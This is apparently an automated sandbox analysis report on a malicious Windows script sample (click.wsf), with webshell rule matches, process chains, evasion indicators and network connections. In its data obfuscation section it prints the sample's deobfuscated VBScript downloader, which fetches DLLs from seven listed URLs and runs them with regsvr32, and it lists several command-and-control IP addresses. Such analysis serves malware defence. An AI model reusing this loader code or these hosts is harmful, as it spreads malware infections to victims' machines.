        Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\BlUwZJEPejvMeG\Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800068183_2_0000000180006818
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8783_2_000000018000B878
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800071103_2_0000000180007110
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D283_2_0000000180008D28
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800145553_2_0000000180014555
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_004500003_2_00450000
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073CC143_2_0073CC14
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A0003_2_0074A000
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074709C3_2_0074709C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737D6C3_2_00737D6C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073263C3_2_0073263C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738BC83_2_00738BC8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748FC83_2_00748FC8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00746C703_2_00746C70
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073D4743_2_0073D474
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00732C783_2_00732C78
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073C0783_2_0073C078
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073B07C3_2_0073B07C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074B4603_2_0074B460
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007554503_2_00755450
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074C0583_2_0074C058
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007378403_2_00737840
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074C44C3_2_0074C44C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007410303_2_00741030
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074EC303_2_0074EC30
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073B83C3_2_0073B83C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0075181C3_2_0075181C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007310003_2_00731000
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007394083_2_00739408
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737C083_2_00737C08
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733CF43_2_00733CF4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007390F83_2_007390F8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007348FC3_2_007348FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007420E03_2_007420E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00743CD43_2_00743CD4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007314D43_2_007314D4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007318DC3_2_007318DC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00745CC43_2_00745CC4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073F8C43_2_0073F8C4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007408CC3_2_007408CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007380CC3_2_007380CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A8B03_2_0074A8B0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007594BC3_2_007594BC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073DCB83_2_0073DCB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007398AC3_2_007398AC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073AC943_2_0073AC94
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074CC843_2_0074CC84
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007458803_2_00745880
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00734C843_2_00734C84
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007375303_2_00737530
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074B1303_2_0074B130
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007361383_2_00736138
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007419243_2_00741924
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00744D203_2_00744D20
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074AD283_2_0074AD28
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007599103_2_00759910
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007475183_2_00747518
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007585003_2_00758500
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074610C3_2_0074610C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074D5F03_2_0074D5F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007415C83_2_007415C8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007395BC3_2_007395BC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074BDA03_2_0074BDA0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00740A703_2_00740A70
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007332743_2_00733274
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A6603_2_0073A660
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073B2583_2_0073B258
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073F65C3_2_0073F65C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A2443_2_0074A244
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748A2C3_2_00748A2C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00740E2C3_2_00740E2C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074662C3_2_0074662C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073BA2C3_2_0073BA2C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007342143_2_00734214
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073461C3_2_0073461C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00745A003_2_00745A00
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00758A003_2_00758A00
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074020C3_2_0074020C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748E083_2_00748E08
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733E0C3_2_00733E0C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007392F03_2_007392F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007496D43_2_007496D4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074EAC03_2_0074EAC0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073D6CC3_2_0073D6CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A6BC3_2_0074A6BC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073AAB83_2_0073AAB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00734EB83_2_00734EB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733ABC3_2_00733ABC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073BE903_2_0073BE90
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00744A903_2_00744A90
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00754E8C3_2_00754E8C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738A8C3_2_00738A8C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074D7703_2_0074D770
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074CF703_2_0074CF70
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007383783_2_00738378
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073F77C3_2_0073F77C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074E7503_2_0074E750
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007347583_2_00734758
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073975C3_2_0073975C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073D33C3_2_0073D33C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00743B143_2_00743B14
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074E3103_2_0074E310
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073EF143_2_0073EF14
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00744F183_2_00744F18
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A7F03_2_0073A7F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007527EC3_2_007527EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00743FD03_2_00743FD0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00732FD43_2_00732FD4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007333D43_2_007333D4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007497CC3_2_007497CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738FB03_2_00738FB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073FFB83_2_0073FFB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748BB83_2_00748BB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073DBA03_2_0073DBA0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00731B943_2_00731B94
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007453843_2_00745384
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,3_2_0000000180010AC0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,3_2_0000000180010DB0
        Source: click.wsfInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\rad75349.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"Jump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\FeedbackJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winWSF@5/8@3/54
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,3_2_00738BC8
        Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.scriptfullname)set request=createobject("winhttp.winhttprequest.5.1")set file=wscript.createobject("shell.application")set strout=createobject("adodb.stream")useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""pat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"set triplett=createobject("wscript.shell")url1 = "https://penshorn.org/admin/Ses8712iGR8du/"url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"url3 = "https://www.gomespontes.com.br/logs/pd/"url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"url5 = "http://ozmeydan.com/cekici/9/"url6 = "http://softwareulike.com/cWIYxWMPkK/"url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"docall dowloop while urlcount<8public function dow()on error resume nextselect case urlcountcase 1downstr=url1case 2downstr=url2case 3downstr=url3case 4downstr=url4case 5downstr=url5case 6downstr=url6case 7downstr=url7end selectrequest.open "get",downstr,falserequest.sendIf Err.Number<>0 thenurlcount=urlcount+1elsestrout.openstrout.type=1if vare=0 thencad=1elsefar=2end ifstrout.write (request.responsebody)if roum=0 thensio=sio+1elseend ifstrout.savetofile pat3strout.closearmour = "samcom."set fsobject=createobject("scripting.filesystemobject")Set f = fsobject.GetFile(pat3)GetFileSize = clng(f.size/1024)If GetFileSize > 150 Thencall roizeurlcount = 8elsepat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"urlcount=urlcount+1end ifend ifend functionpublic function roizeif derti=0 thensem=sem+1elseend ifurlcount = 8triplett.run (loiu),0,truecor = "samo"set fsobject=createobject("scripting.filesystemobject")set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")textstream.write ("badum tss")if rotate = 12 thensable = 54 + 22elserouttt = "carry"end ifend functionIHost.ScriptFullName();IFileSystem3.GetParentFolderName("C:\Users\user\Desktop\click.wsf");IHost.CreateObject("shell.application");IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://penshorn.org/admin/Ses8712iGR8du/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00000000");_Stream.SaveToFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://www.gomespontes.com.br/logs/pd/", "false");IWinHttp
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A0FC push ebp; iretd 3_2_0073A0FD
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007480D7 push ebp; retf 3_2_007480D8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00736CDE push esi; iretd 3_2_00736CDF
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00736C9F pushad ; ret 3_2_00736CAA
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00739D51 push ebp; retf 3_2_00739D5A
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748157 push ebp; retf 3_2_00748158
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747D4E push ebp; iretd 3_2_00747D4F
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747D3C push ebp; retf 3_2_00747D3D
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747D25 push 4D8BFFFFh; retf 3_2_00747D2A
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A1D2 push ebp; iretd 3_2_0073A1D3
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747987 push ebp; iretd 3_2_0074798F
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A26E push ebp; ret 3_2_0073A26F
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747EAF push 458BCC5Ah; retf 3_2_00747EBC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00739E8B push eax; retf 3_2_00739E8E
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074C731 push esi; iretd 3_2_0074C732
        Source: rad75349.tmp.dll.1.drStatic PE information: section name: _RDATA
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\rad75349.tmp.dllJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)Jump to dropped file
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)Jump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exe TID: 6476Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\regsvr32.exe TID: 6560Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.5 %
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28
        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: wscript.exe, 00000001.00000003.1534710579.000002D846515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542609320.000002D846518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540392196.000002D846515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW10p9pF
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
        Source: wscript.exe, 00000001.00000003.1546482854.000002D8467A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A878 GetProcessHeap,3_2_000000018000A878
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800082EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00000001800017DC

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Benign windows process drops PE files
        Source: C:\Windows\System32\wscript.exeFile created: rad75349.tmp.dll.1.drJump to dropped file
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 31.31.196.172 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 186.202.153.5 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dllJump to behavior
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
